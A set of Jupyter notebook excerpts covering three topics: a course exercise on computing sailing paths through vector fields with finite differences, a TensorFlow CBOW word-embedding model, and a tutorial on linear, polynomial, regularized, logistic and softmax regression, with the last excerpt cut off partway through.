def vel_xy(x,y):
vx = y / 1000.
vy = -x / 1000.
return vx, vy
```
After these preparations, we can plot the velocity vector field
```
# Define figure size
rcParams['figure.figsize'] = 8, 8
fig1, ax1 = plt.subplots()
# Define vector field components for coordinates X,Y
VX,VY = vel_xy(X,Y)
ax1.set_title(r'Plot of velocity vector field $V=(y,-x)^T$')
plt.axis('equal')
Q = ax1.streamplot(X,Y,VX,VY)
plt.xlabel('x [m]')
plt.ylabel('y [m]')
plt.savefig('Plot_vector_field_V_boring.pdf', bbox_inches='tight', format='pdf')
plt.show()
```
So the velocity vector field ${\bf{V}} = (y,-x)^T$ is simply a large vortex with zero velocity at the origin and linear increasing velocities with distance.
### Sailing in the boring vector field $V =(y,-x)^T$
Next, we want to predict our sailing course in this large vortex. Eventhough it is unrealistic, we assume, that such a large vortex exists in the [Kiel Fjord](https://en.wikipedia.org/wiki/Kieler_F%C3%B6rde#/media/File:Kiel_Luftaufnahme.JPG), maybe related to some suspicous, top secret activity in the Kiel military harbor.
##### Exercise 1
Complete the following Python code `sailing_boring`, to predict the sailing course in the boring velocity vector field $V =(y,-x)^T$. Most of the code is already implemented, you only have to add the FD solution of the uncoupled, ordinary differential equations (2):
```
def sailing_boring(tmax, dt, x0, y0):
# Compute number of time steps based on tmax and dt
nt = (int)(tmax/dt)
# vectors for storage of x, y positions
x = np.zeros(nt + 1)
y = np.zeros(nt + 1)
# define initial position
x[0] = x0
y[0] = y0
# start time stepping over time samples n
for n in range(1,nt + 1):
# compute velocity components at current position
vx, vy = vel_xy(x[n-1],y[n-1])
# compute new position using FD approximation of time derivative
# ADD FD SOLUTION OF THE UNCOUPLED, ORDINARY DIFFERENTIAL EQUATIONS (2) HERE!
x[n] =
y[n] =
# Define figure size
rcParams['figure.figsize'] = 8, 8
fig1, ax1 = plt.subplots()
# Define vector field components for Streamplot
VX,VY = vel_xy(X,Y)
ax1.set_title(r'Streamplot of vector field $V=(y,-x)^T$')
plt.axis('equal')
Q = ax1.streamplot(X,Y,VX,VY)
plt.plot(x,y,'r-',linewidth=3)
# mark initial and final position
plt.plot(x[0],y[0],'ro')
plt.plot(x[nt],y[nt],'go')
plt.xlabel('x [m]')
plt.ylabel('y [m]')
plt.savefig('sailing_boring.pdf', bbox_inches='tight', format='pdf')
plt.show()
```
##### Exercise 2
After completing the FD code `sailing_boring`, we can define some basic modelling parameters. How long do you want to sail, defined by the parameter $tmax [s]$. What time step $dt$ do you want to use? $dt=1.\;s$ should work for the first test of your FD code. To solve the problem you also have to define the initial position of your boat. Let's assume that ${\bf{x_{0}}}=(-900,0)^T$ is the location of some jetty on the western shore of the Kiel Fjord.
By executing the cell below (`SHIFT+ENTER`), the FD code `sailing_boring` should compute the course of the boat and plot it as red line on top of the `Streamplot`. Inital and final position are defined by a red and green dot, respectively.
What course would you expect, based on the `Streamplot`? Is it confirmed by your FD code solution? If not, there might be an error in your FD implementation.
```
# How long do you want to sail [s] ?
tmax = 1000
# Define time step dt
dt = 1.
# Define initial position
x0 = -900.
y0 = 0.
# Sail for tmax s in the boring vector field
sailing_boring(tmax, dt, x0, y0)
```
##### Exercise 3
At this point you might get an idea why the code is called `sailing_boring`. We start at the western shore of the Kiel Fjord, follow an enclosed streamline to the eastern shore and travel back to the initial position of the jetty - it 's a boring Kiel harbor tour.
How long will the boring tour actually take? Vary $tmax$ until the green dot of the final position coincides with the red dot of the initial position.
You also might think: why should I invest so much computation time into this boring tour.
Copy the cell above, below this text box and increase the time step $dt$ to 20 s. How does the new FD solution differ from the one above with $dt=1\; s$? Give a possible explanation.
### Sailing in the more exciting vector field $V=(cos((x+y)/500),sin((x-y)/500))^T$
Time to sail in a more complex and exciting velocity vector field, like this one:
\begin{equation}
V=(cos((x+y)/500),sin((x-y)/500))^T \notag
\end{equation}
As in the case of the boring vector field, we define a function to compute the velocity components for a given ${\bf{x}} = (x,y)^T$:
```
# define new vector field
def vel_xy_1(x,y):
vx = np.cos((x+y)/500)
vy = np.sin((x-y)/500)
return vx, vy
```
For the visualization of this more complex vector field, I recommend to use a `Quiver` instead of the `Streamplot`
```
# Define figure size
rcParams['figure.figsize'] = 8, 8
fig1, ax1 = plt.subplots()
# Define vector field components for coordinates X,Y
VX,VY = vel_xy_1(X,Y)
ax1.set_title(r'Plot of vector field $V=(cos((x+y)/500),sin((x-y)/500))^T$')
plt.axis('equal')
Q = ax1.quiver(X,Y,VX,VY)
plt.plot(392,392,'ro')
plt.xlabel('x [m]')
plt.ylabel('y [m]')
#plt.savefig('Plot_vector_field_V_exciting.pdf', bbox_inches='tight', format='pdf')
plt.show()
```
##### Exercise 4
Now, this velocity vector field looks more exciting, than the previous one. The red dot at ${\bf{x_{island}}}=(392,392)^T$ marks the location of an island you want to reach. To compute the course, we can recycle most parts of the `sailing_boring` code.
- Rename the code below from `sailing_boring` to `sailing_exciting`
- Add the FD solution of the uncoupled, ordinary differential equations (2) to the code
- Replace in the new `sailing_exciting` code the function calls of the boring velocity field `vel_xy` by the new exciting velocity field `vel_xy_1`
- Replace in `sailing_exciting` the `Streamplot` by a `Quiver` plot.
- Mark the position of the island by a red dot by inserting
```python
plt.plot(392,392,'ro')
```
below the `Quiver` plot in `sailing_exciting`
```
def sailing_boring(tmax, dt, x0, y0):
# Compute number of time steps
nt = (int)(tmax/dt)
# vectors for storage of x, y positions
x = np.zeros(nt + 1)
y = np.zeros(nt + 1)
# define initial position
x[0] = x0
y[0] = y0
# start time stepping
for n in range(1,nt + 1):
# compute velocity components at current position
vx, vy = vel_xy(x[n-1],y[n-1])
# compute new position using FD approximation of time derivative
# ADD FD SOLUTION OF THE UNCOUPLED, ORDINARY DIFFERENTIAL EQUATIONS (2) HERE!
x[n] =
y[n] =
# Define figure size
rcParams['figure.figsize'] = 8, 8
fig1, ax1 = plt.subplots()
# Define vector field components for quiver plot
VX,VY = vel_xy(X,Y)
ax1.set_title(r'Plot of vector field $V=(cos((x+y)/500),sin((x-y)/500))^T$')
plt.axis('equal')
Q = ax1.streamplot(X,Y,VX,VY)
plt.plot(x,y,'r-',linewidth=3)
# mark initial and final position
plt.plot(x[0],y[0],'ro')
plt.plot(x[nt],y[nt],'go')
print(x[nt],y[nt])
plt.xlabel('x [m]')
plt.ylabel('y [m]')
plt.savefig('sailing_exciting.pdf', bbox_inches='tight', format='pdf')
plt.show()
```
##### Exercise 5
Time to sail to the island. To make the problem more interesting, you have to find a course to the island from the north, south, east and west boundaries. In the four cells below the x0 and y0 coordinates of the given boundary is already defined. You only have to add and change the missing coordinate vector component until you reach the island. You might also have to modify $tmax$.
**Approach from the northern boundary**
```
# How long do you want to sail [s] ?
tmax = 1000
# Define time step dt
dt = 2.
# DEFINE INTIAL POSITION AT NORTHERN BOUNDARY HERE!
x0 =
y0 = 950.
# Sail for tmax s in the boring vector field
sailing_exciting(tmax, dt, x0, y0)
```
**Approach from the southern boundary**
```
# How long do you want to sail [s] ?
tmax = 1000
# Define time step dt
dt = 2.
# DEFINE INTIAL POSITION AT SOUTHERN BOUNDARY HERE!
x0 =
y0 = -980.
# Sail for tmax s in the boring vector field
sailing_exciting(tmax, dt, x0, y0)
```
**Approach from the western boundary**
```
# How long do you want to sail [s] ?
tmax = 1000
# Define time step dt
dt = 2.
# DEFINE INTIAL POSITION AT WESTERN BOUNDARY HERE!
x0 = -950.
y0 =
# Sail for tmax s in the boring vector field
sailing_exciting(tmax, dt, x0, y0)
```
**Approach from the eastern boundary**
```
# How long do you want to sail [s] ?
tmax = 1000
# Define time step dt
dt = 2.
# DEFINE INTIAL POSITION AT EASTERN BOUNDARY HERE!
x0 = 990.
y0 =
# Sail for tmax s in the boring vector field
sailing_exciting(tmax, dt, x0, y0)
```
##### Bonus Exercise
How do you reach the blue island in the vector plot below?
```
# Define figure size
rcParams['figure.figsize'] = 8, 8
fig1, ax1 = plt.subplots()
# Define vector field components for coordinates X,Y
VX,VY = vel_xy_1(X,Y)
ax1.set_title(r'Plot of vector field $V=(cos((x+y)/500),sin((x-y)/500))^T$')
plt.axis('equal')
Q = ax1.quiver(X,Y,VX,VY)
plt.plot(-392,-392,'bo')
plt.xlabel('x [m]')
plt.ylabel('y [m]')
plt.show()
```
## What we learned
- How to solve a simple system of ordinary differential equations by an explicit time integration scheme
- The long-term impact of small inaccuracies in time integration schemes by choosing a too large time step $dt$
- The solution to a problem is not only defined by a differential equation, but also by an initial condition
- How to sail without wind, by using flow data and numerical solutions of ordinary differential equations
| github_jupyter |
- Tensor board projection
- Visualizing loss and network on tensorboard
- Comments
```
%reload_ext autoreload
%autoreload 2
%matplotlib inline
import mpld3
mpld3.enable_notebook()
from pylab import rcParams
rcParams['figure.figsize'] = 10, 10
import sys
import numpy as np
import random
import math
import tensorflow as tf
import matplotlib.pyplot as plt
sys.path.append("./../../Utils/")
from readWikiData import get_wikipedia_data
```
##### Get representation
```
sentences, word2idx, idx2word, _ = get_wikipedia_data(n_files=10, n_vocab=1000, by_paragraph=True)
def get_wiki_data_cbow(sentences, word2idx, window_size=5):
training_data = []
vocab_size = len(word2idx)
for sentence in sentences:
if len(sentence) < window_size * 2 + 1:
continue
for i in range(len(sentence)):
left_context = sentence[max(i-window_size, 0): i]
right_context = sentence[i+1:window_size + i + 1]
centre = sentence[i]
if len(left_context + right_context) < (2*window_size):
len_left = len(left_context)
len_right = len(right_context)
if len_left < len_right:
right_context = sentence[i+1 : window_size + i + 1 + (len_right - len_left)]
else:
left_context = sentence[max(i-window_size - (len_left - len_right), 0): i]
temp = left_context + right_context
if len(temp) < window_size * 2:
print sentence
print left_context
print right_context
print centre
break
training_data.append((tuple(temp), centre))
print training_data[:10]
training_data = list(set(training_data))
idx2word = {v:k for k, v in word2idx.iteritems()}
return len(word2idx), training_data, word2idx, idx2word
vocab_size, training_data, word2idx, idx2word = get_wiki_data_cbow(sentences, word2idx)
len(training_data)
training_data[:10]
```
##### Get batches
```
bucket_list = []
def getNextBatchCbow(bi_grams_, window_size=5, batch_size=10000):
global bucket_list
docs_ids_to_select = list(set(bi_grams_) - set(bucket_list))
if len(docs_ids_to_select) < batch_size:
bucket_list = []
docs_ids_to_select = bi_grams_
# Initialize two variables
train_X = np.ndarray(shape=(batch_size, window_size*2), dtype=np.int32)
train_label = np.ndarray(shape=(batch_size, 1), dtype=np.int32)
# Get a random set of docs
random_docs = random.sample(docs_ids_to_select, batch_size)
bucket_list += random_docs
index = 0
# Iterate threw all the docs
for item in random_docs:
train_X[index] = item[0]
train_label[index] = item[1]
index += 1
return train_X, train_label
#getNextBatchCbow(training_data, 2)
```
##### Let's design the graph
```
def init_weight(Mi, Mo):
shape_sum = float(Mi + Mo)
return np.random.uniform(-np.sqrt(6/shape_sum),np.sqrt(6/shape_sum), [Mi, Mo])
embedding_size_w = 100
vocab_size = len(word2idx)
n_neg_samples = 20
learning_rate = 10e-5
epochs = 2
batch_size=10000
mu = 0.99
window_size = 5
# Define placeholders for training
train_X = tf.placeholder(tf.int32, shape=[batch_size, None])
train_label = tf.placeholder(tf.int32, shape=[batch_size, 1])
# Define matrix for doc_embedding and word_embedding
W1 = tf.Variable(init_weight(vocab_size, embedding_size_w), name="W1", dtype=tf.float32)
# Define weights for the output unit
W2 = tf.Variable(init_weight(vocab_size, embedding_size_w), name="W2", dtype=tf.float32)
biases = tf.Variable(tf.zeros(vocab_size))
print(train_X.get_shape(), train_label.get_shape(), W1.get_shape(), W2.get_shape())
embed = []
# generating a vector of size embedding_size_d
embed_w = tf.zeros([1, embedding_size_w], dtype=tf.float32)
# add all the word vecs in window_size
for j in range(window_size*2):
embed_w += tf.nn.embedding_lookup(W1, train_X[:, j])
#embed.append(embed_w)
#embed = tf.concat(1, embed)/(window_size*2)
embed = embed_w/(window_size*2)
print(embed.get_shape())
loss = tf.nn.sampled_softmax_loss(weights=W2, \
biases=biases, \
labels=train_label, \
inputs=embed, \
num_sampled=n_neg_samples, \
num_classes=vocab_size)
loss = tf.reduce_mean(loss)
#optimizer = tf.train.MomentumOptimizer(learning_rate=learning_rate, momentum=mu).minimize(loss)
#optimizer = tf.train.AdagradOptimizer(learning_rate).minimize(loss)
global_step = tf.Variable(0, trainable=False)
starter_learning_rate = 0.01
learning_rate = tf.train.exponential_decay(starter_learning_rate, global_step,
1000, 0.96, staircase=True)
# Passing global_step to minimize() will increment it at each step.
optimizer = (
tf.train.MomentumOptimizer(learning_rate, momentum=mu).minimize(loss, global_step=global_step)
)
saver = tf.train.Saver()
with tf.Session() as sess:
init = tf.global_variables_initializer()
sess.run(init)
average_loss = 0
for step in range(epochs):
epoch_error = 0.0
temp_X , temp_labels = getNextBatchCbow(window_size=5, bi_grams_=training_data)
feed_dict = {train_X : temp_X, train_label : temp_labels}
op, l = sess.run([optimizer, loss],
feed_dict=feed_dict)
epoch_error += l
if step % 100 == 0:
print "Error at epoch : ", step, " = ", epoch_error
save_path = saver.save(sess, "./models/model_cbow_model.ckpt")
print("Model saved in file: %s" % save_path)
```
##### Embeddings
```
W1_embedding = None
W2_embedding = None
with tf.Session() as sess:
saver = tf.train.Saver()
# Restore variables from disk.
saver.restore(sess, "./models/model_cbow_model.ckpt")
print("Model restored.")
# Normalize word2vec
W1_embedding = W1.eval()
# Normalize word2vec
W2_embedding = W2.eval()
W1_embedding.shape
W2_embedding.shape
word2vec = np.mean([W1_embedding, W2_embedding], axis=0)
word2vec.shape
```
##### Projection of embeddings using t-SNE
```
idx2word = {v:k for k, v in word2idx.items()}
from sklearn.manifold import TSNE
model = TSNE()
Z = model.fit_transform(word2vec)
plt.scatter(Z[:,0], Z[:,1])
for i in xrange(len(idx2word)):
try:
plt.annotate(s=idx2word[i].encode("utf8"), xy=(Z[i,0], Z[i,1]))
except:
print "bad string:", idx2word[i]
plt.show()
```
| github_jupyter |
<a href="https://colab.research.google.com/github/Priyam145/MLprojects/blob/main/notebooks/LinearRegression_maths.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
```
import numpy as np
X = 2 * np.random.rand(100, 1)
y = 4 + 3 * X + np.random.randn(100, 1)
import matplotlib.pyplot as plt
import seaborn as sns
fig, axs = plt.subplots(figsize=(10, 7))
fig.set_facecolor("white")
plt.scatter(X, y);
axs.set_xlabel('X')
axs.set_ylabel('y')
axs.set_xlim(xmin=0)
axs.set_ylim(ymin=0)
X_b = np.c_[np.ones((100, 1)), X]
theta_best = np.linalg.inv(X_b.T.dot(X_b)).dot(X_b.T).dot(y)
X_b[:5]
theta_best
fig, axs = plt.subplots(figsize=(10, 7))
fig.set_facecolor("white")
plt.scatter(X, y);
plt.plot(X, X_b.dot(theta_best), color='red', label='Prediction line')
axs.set_xlabel('X')
axs.set_ylabel('y')
axs.set_xlim(xmin=0)
axs.set_ylim(ymin=0)
plt.legend();
X_new = np.array([[0], [2]])
X_new_b = np.c_[np.ones((2, 1)), X_new] # add x0 = 1 to each instance
y_predict = X_new_b.dot(theta_best)
y_predict
from sklearn.linear_model import LinearRegression
lin_reg = LinearRegression()
lin_reg.fit(X, y)
lin_reg.intercept_, lin_reg.coef_
lin_reg.predict(X_new)
theta_best_svd, residuals, rank, s = np.linalg.lstsq(X_b, y, rcond=1e-6)
theta_best_svd
np.linalg.pinv(X_b).dot(y)
eta = 0.1
n_iterations = 1000
m = 100
fig, axs = plt.subplots(figsize=(15, 10))
fig.set_facecolor("white")
plt.scatter(X, y);
axs.set_xlabel(r'$X_1$')
axs.set_ylabel('y')
axs.set_xlim(xmin=0)
axs.set_ylim(ymin=0)
theta = np.random.randn(2, 1)
for iteration in range(n_iterations):
gradients = 2/m*X_b.T.dot(X_b.dot(theta) - y)
theta = theta - eta * gradients
if iteration < 10:
plt.plot(X, X_b.dot(theta), label=f'iteration {iteration+1}')
axs.set_title('{eta}'.format(eta=r'$\eta = 0.1$'))
plt.legend();
theta
```
# Stochastic Gradient Descent
```
n_epochs = 50
t0, t1 = 5, 50 # learning schedule hyperparamters
def learning_schedule(t):
return t0 / (t + t1)
theta = np.random.randn(2, 1) # random initialization
for epoch in range(n_epochs):
for i in range(m):
random_index = np.random.randint(m)
xi = X_b[random_index:random_index + 1]
yi = y[random_index:random_index + 1]
gradients = 2 * xi.T.dot(xi.dot(theta) - yi)
eta = learning_schedule(epoch * m + i)
theta = theta - eta * gradients
theta
from sklearn.linear_model import SGDRegressor
sgd_reg = SGDRegressor(max_iter=1000, tol=1e-3, penalty=None, eta0=0.1)
sgd_reg.fit(X, y.ravel())
sgd_reg.intercept_, sgd_reg.coef_
```
# Mini-Batch Gradient Descent
# Polynomial Regression
```
m = 100
X = 6 * np.random.rand(m, 1) - 3
y = 0.5 * X**2 + X + 2 + np.random.randn(m, 1)
fig, axs = plt.subplots(figsize=(15, 10))
fig.set_facecolor("white")
plt.scatter(X, y);
axs.set_xlabel(r'$X_1$')
axs.set_ylabel('y')
axs.set_xlim(xmin=-3)
axs.set_ylim(ymin=0);
from sklearn.preprocessing import PolynomialFeatures
poly_features = PolynomialFeatures(degree=2, include_bias=False)
X_poly = poly_features.fit_transform(X)
X[0]
X_poly[0]
lin_reg = LinearRegression()
lin_reg.fit(X_poly, y)
lin_reg.intercept_, lin_reg.coef_
fig, axs = plt.subplots(figsize=(15, 10))
fig.set_facecolor("white")
plt.scatter(X, y)
X_new=np.linspace(-3, 3, 100).reshape(100, 1)
X_new_poly = poly_features.transform(X_new)
y_new = lin_reg.predict(X_new_poly)
plt.plot(X_new, y_new, "r-", linewidth=2, label="Predictions")
axs.set_xlabel(r'$X_1$')
axs.set_ylabel('y')
axs.set_xlim(xmin=-3)
axs.set_ylim(ymin=0);
from sklearn.preprocessing import StandardScaler
from sklearn.pipeline import Pipeline
fig, axs = plt.subplots(figsize=(10, 7))
fig.set_facecolor('white')
for style, width, degree in (("g-", 1, 300), ("b--", 2, 2), ("r-+", 2, 1)):
polybig_features = PolynomialFeatures(degree=degree, include_bias=False)
std_scaler = StandardScaler()
lin_reg = LinearRegression()
polynomial_regression = Pipeline([
("poly_features", polybig_features),
("std_scaler", std_scaler),
("lin_reg", lin_reg),
])
polynomial_regression.fit(X, y)
y_newbig = polynomial_regression.predict(X_new)
plt.plot(X_new, y_newbig, style, label=str(degree), linewidth=width)
plt.plot(X, y, "b.", linewidth=3)
plt.legend(loc="upper left")
plt.xlabel("$x_1$", fontsize=18)
plt.ylabel("$y$", rotation=0, fontsize=18)
plt.axis([-3, 3, 0, 10])
plt.show()
from sklearn.metrics import mean_squared_error
from sklearn.model_selection import train_test_split
def plot_learning_curves(model, X, y):
fig, axs = plt.subplots(figsize=(10, 7))
fig.set_facecolor('white')
X_train, X_val, y_train, y_val = train_test_split(X, y, test_size=0.2)
train_errors, val_errors = [], []
for m in range(1, len(X_train)):
model.fit(X_train[:m], y_train[:m])
y_train_predict = model.predict(X_train[:m])
y_val_predict = model.predict(X_val)
train_errors.append(mean_squared_error(y_train[:m], y_train_predict))
val_errors.append(mean_squared_error(y_val, y_val_predict))
plt.plot(np.sqrt(train_errors), 'r-+', linewidth=2, label='train')
plt.plot(np.sqrt(val_errors), 'b-', linewidth=3, label='val')
axs.set_xlabel('Training set size')
axs.set_ylabel('RMSE')
axs.set_xlim(xmin=0)
axs.set_ylim(ymin=0, ymax=3.0)
plt.legend()
lin_reg = LinearRegression()
plot_learning_curves(lin_reg, X, y)
from sklearn.pipeline import Pipeline
polynomial_regression = Pipeline([
("poly_features", PolynomialFeatures(degree=10, include_bias=False)),
("lin_reg", LinearRegression())
])
plot_learning_curves(polynomial_regression, X, y)
```
# Ridge Regression
```
from sklearn.linear_model import Ridge
ridge_reg = Ridge(alpha=1, solver='cholesky')
ridge_reg.fit(X, y)
ridge_reg.predict([[1.5]])
sgd_reg = SGDRegressor(penalty='l2')
sgd_reg.fit(X, y.ravel())
sgd_reg.predict([[1.5]])
```
# Lasso Regression
```
from sklearn.linear_model import Lasso
lasso_reg = Lasso(alpha=0.1)
lasso_reg.fit(X, y)
lasso_reg.predict([[1.5]])
lasso_reg = SGDRegressor(penalty='l1')
lasso_reg.fit(X, y.ravel())
lasso_reg.predict([[1.5]])
t1a, t1b, t2a, t2b = -1, 3, -1.5, 1.5
t1s = np.linspace(t1a, t1b, 500)
t2s = np.linspace(t2a, t2b, 500)
t1, t2 = np.meshgrid(t1s, t2s)
print(t1.shape)
T = np.c_[t1.ravel(), t2.ravel()]
Xr = np.array([[1, 1], [1, -1], [1, 0.5]])
yr = 2 * Xr[:, :1] + 0.5 * Xr[:, 1:]
J = (1/len(Xr) * np.sum((T.dot(Xr.T) - yr.T)**2, axis=1)).reshape(t1.shape)
N1 = np.linalg.norm(T, ord=1, axis=1).reshape(t1.shape)
N2 = np.linalg.norm(T, ord=2, axis=1).reshape(t1.shape)
t_min_idx = np.unravel_index(np.argmin(J), J.shape)
t1_min, t2_min = t1[t_min_idx], t2[t_min_idx]
t_init = np.array([[0.25], [-1]])
def bgd_path(theta, X, y, l1, l2, core = 1, eta = 0.05, n_iterations = 200):
path = [theta]
for iteration in range(n_iterations):
gradients = core * 2/len(X) * X.T.dot(X.dot(theta) - y) + l1 * np.sign(theta) + l2 * theta
theta = theta - eta * gradients
path.append(theta)
return np.array(path)
fig, axes = plt.subplots(2, 2, sharex=True, sharey=True, figsize=(10.1, 8))
fig.set_facecolor('white')
for i, N, l1, l2, title in ((0, N1, 2., 0, "Lasso"), (1, N2, 0, 2., "Ridge")):
JR = J + l1 * N1 + l2 * 0.5 * N2**2
tr_min_idx = np.unravel_index(np.argmin(JR), JR.shape)
t1r_min, t2r_min = t1[tr_min_idx], t2[tr_min_idx]
levelsJ=(np.exp(np.linspace(0, 1, 20)) - 1) * (np.max(J) - np.min(J)) + np.min(J)
levelsJR=(np.exp(np.linspace(0, 1, 20)) - 1) * (np.max(JR) - np.min(JR)) + np.min(JR)
levelsN=np.linspace(0, np.max(N), 10)
path_J = bgd_path(t_init, Xr, yr, l1=0, l2=0)
path_JR = bgd_path(t_init, Xr, yr, l1, l2)
path_N = bgd_path(np.array([[2.0], [0.5]]), Xr, yr, np.sign(l1)/3, np.sign(l2), core=0)
ax = axes[i, 0]
ax.grid(True)
ax.axhline(y=0, color='k')
ax.axvline(x=0, color='k')
ax.contourf(t1, t2, N / 2., levels=levelsN)
ax.plot(path_N[:, 0], path_N[:, 1], "y--")
ax.plot(0, 0, "ys")
ax.plot(t1_min, t2_min, "ys")
ax.set_title(r"$\ell_{}$ penalty".format(i + 1), fontsize=16)
ax.axis([t1a, t1b, t2a, t2b])
if i == 1:
ax.set_xlabel(r"$\theta_1$", fontsize=16)
ax.set_ylabel(r"$\theta_2$", fontsize=16, rotation=0)
ax = axes[i, 1]
ax.grid(True)
ax.axhline(y=0, color='k')
ax.axvline(x=0, color='k')
ax.contourf(t1, t2, JR, levels=levelsJR, alpha=0.9)
ax.plot(path_JR[:, 0], path_JR[:, 1], "w-o")
ax.plot(path_N[:, 0], path_N[:, 1], "y--")
ax.plot(0, 0, "ys")
ax.plot(t1_min, t2_min, "ys")
ax.plot(t1r_min, t2r_min, "rs")
ax.set_title(title, fontsize=16)
ax.axis([t1a, t1b, t2a, t2b])
if i == 1:
ax.set_xlabel(r"$\theta_1$", fontsize=16)
plt.show()
```
# Elastic Net
```
from sklearn.linear_model import ElasticNet
elastic_net = ElasticNet(alpha=0.1, l1_ratio=0.5)
elastic_net.fit(X, y)
elastic_net.predict([[1.5]])
```
# Early Stopping
```
np.random.seed(42)
m = 100
X = 6 * np.random.rand(m, 1) - 3
y = 2 + X + 0.5 * X**2 + np.random.randn(m, 1)
X_train, X_val, y_train, y_val = train_test_split(X[:50], y[:50].ravel(), test_size=0.5, random_state=10)
```
## Early Stopping - Example Code:
```
from copy import deepcopy
poly_scaler = Pipeline([
("poly_features", PolynomialFeatures(degree=90, include_bias=False)),
("std_scaler", StandardScaler())
])
X_train_poly_scaled = poly_scaler.fit_transform(X_train)
X_val_poly_scaled = poly_scaler.transform(X_val)
sgd_reg = SGDRegressor(max_iter=1, tol=-np.infty, warm_start=True,
penalty=None, learning_rate="constant", eta0=0.0005, random_state=42)
minimum_val_error = float("inf")
best_epoch = None
best_model = None
for epoch in range(1000):
sgd_reg.fit(X_train_poly_scaled, y_train) # continues where it left off
y_val_predict = sgd_reg.predict(X_val_poly_scaled)
val_error = mean_squared_error(y_val, y_val_predict)
if val_error < minimum_val_error:
minimum_val_error = val_error
best_epoch = epoch
best_model = deepcopy(sgd_reg)
```
## Early Stopping - Graph:
```
sgd_reg = SGDRegressor(max_iter=1, tol=-np.infty, warm_start=True,
penalty=None, learning_rate="constant", eta0=0.0005, random_state=42)
n_epochs = 500
train_errors, val_errors = [], []
for epoch in range(n_epochs):
sgd_reg.fit(X_train_poly_scaled, y_train)
y_train_predict = sgd_reg.predict(X_train_poly_scaled)
y_val_predict = sgd_reg.predict(X_val_poly_scaled)
train_errors.append(mean_squared_error(y_train, y_train_predict))
val_errors.append(mean_squared_error(y_val, y_val_predict))
best_epoch = np.argmin(val_errors)
best_val_rmse = np.sqrt(val_errors[best_epoch])
fig, axs = plt.subplots(figsize=(10, 7))
fig.set_facecolor('white')
plt.annotate('Best model',
xy=(best_epoch, best_val_rmse),
xytext=(best_epoch, best_val_rmse + 1),
ha="center",
arrowprops=dict(facecolor='black', shrink=0.05),
fontsize=16,
)
best_val_rmse -= 0.03 # just to make the graph look better
plt.plot([0, n_epochs], [best_val_rmse, best_val_rmse], "k:", linewidth=2)
plt.plot(np.sqrt(val_errors), "b-", linewidth=3, label="Validation set")
plt.plot(np.sqrt(train_errors), "r--", linewidth=2, label="Training set")
plt.legend(loc="upper right", fontsize=14)
plt.xlabel("Epoch", fontsize=14)
plt.ylabel("RMSE", fontsize=14)
plt.show()
```
# Logistic Regression
```
t = np.linspace(-10, 10, 100)
sig = 1 / (1 + np.exp(-t))
fig, axs = plt.subplots(figsize=(15, 7))
fig.set_facecolor('white')
plt.plot([-10, 10], [0, 0], "k-")
plt.plot([-10, 10], [0.5, 0.5], "k:")
plt.plot([-10, 10], [1, 1], "k:")
plt.plot([0, 0], [-1.1, 1.1], "k-")
plt.plot(t, sig, "b-", linewidth=2, label=r"$\sigma(t) = \frac{1}{1 + e^{-t}}$")
plt.xlabel("t")
plt.legend(loc="upper left", fontsize=20)
plt.axis([-10, 10, -0.1, 1.1])
plt.show()
from sklearn import datasets
iris = datasets.load_iris()
list(iris.keys())
X = iris["data"][:, 3:] # petal width
y = (iris["target"] == 2).astype(np.int) # 1 if Iris virginica, else 0
from sklearn.linear_model import LogisticRegression
log_reg = LogisticRegression()
log_reg.fit(X, y)
X_new = np.linspace(0, 3, 1000).reshape(-1, 1)
y_proba = log_reg.predict_proba(X_new)
fig, axs = plt.subplots(figsize=(10, 5))
fig.set_facecolor('white')
plt.plot(X_new, y_proba[:, 1], "g-", label="Iris virginica")
plt.plot(X_new, y_proba[:, 0], "b--", label="Not Iris virginica")
axs.set_xlim(xmin=0)
axs.set_ylim(ymin=0);
fig, axs = plt.subplots(figsize=(15, 7))
fig.set_facecolor('white')
X_new = np.linspace(0, 3, 1000).reshape(-1, 1)
y_proba = log_reg.predict_proba(X_new)
decision_boundary = X_new[y_proba[:, 1] >= 0.5][0]
plt.plot(X[y==0], y[y==0], "bs")
plt.plot(X[y==1], y[y==1], "g^")
plt.plot([decision_boundary, decision_boundary], [-1, 2], "k:", linewidth=2)
plt.plot(X_new, y_proba[:, 1], "g-", linewidth=2, label="Iris virginica")
plt.plot(X_new, y_proba[:, 0], "b--", linewidth=2, label="Not Iris virginica")
plt.text(decision_boundary+0.02, 0.15, "Decision boundary", fontsize=14, color="k", ha="center")
plt.arrow(decision_boundary, 0.08, -0.3, 0, head_width=0.05, head_length=0.1, fc='b', ec='b')
plt.arrow(decision_boundary, 0.92, 0.3, 0, head_width=0.05, head_length=0.1, fc='g', ec='g')
plt.xlabel("Petal width (cm)", fontsize=14)
plt.ylabel("Probability", fontsize=14)
plt.legend(loc="center left", fontsize=14)
plt.axis([0, 3, -0.02, 1.02])
plt.show()
log_reg.predict([[1.7], [1.5]])
```
# Softmax Regression
```
X = iris["data"][:, (2, 3)]
y = iris["target"]
softmax_reg = LogisticRegression(multi_class="multinomial", solver="lbfgs", C=10)
softmax_reg.fit(X, y)
softmax_reg.predict([[5, 2]])
softmax_reg.predict_proba([[5, 2]])
```
## Softmax Regression (Without scikit-learn):
```
import pandas as pd
iris_data = iris["data"]
iris_target = iris["target"]
iris_data[:5]
iris_target[:5]
np.unique(iris_target)
iris["target_names"]
```
### Adding bias to the data:
Every data will have a certain amount of bias i.e $x^{i}_0$ = 1, where $x^{i}_0$ = $0^{th}$ feature of $i^{th}$ instance of x
```
iris_data_with_bias = np.c_[np.ones((iris_data.shape[0], 1)), iris_data]
iris_data_with_bias[:5]
```
### Splitting the dataset into train and test without using Scikit-learn (train_test_split)
We will follow the general practice of splitting the dataset into 80% train and 20% test.
```
def train_test_split(X, y, test_ratio=0.2):
total_size = len(X)
random_indices = np.random.permutation(total_size)
train_size = int(total_size*(1 - test_ratio))
train = X[random_indices[:train_size]]
train_result = y[random_indices[:train_size]]
test = X[random_indices[train_size:]]
test_result = y[random_indices[train_size:]]
return train, train_result, test, test_result
iris_train, iris_train_result, iris_test, iris_test_result = train_test_split(iris_data_with_bias,
iris_target,
test_ratio=0.2)
print('training:', iris_train.shape,'training_result:', iris_train_result.shape )
print('train set:\n',iris_train[:5])
print('train result set:\n', iris_train_result[:5])
print('test:', iris_test.shape,'test_result:', iris_test_result.shape )
print('test set:\n',iris_test[:5])
print('test result set:\n', iris_test_result[:5])
```
### One-hot Encoding the train target set:
```
def one_hot_encoder(target):
encoded_target = np.zeros(shape=(target.size, np.unique(target).size))
encoded_target[np.arange(target.size), target] = 1
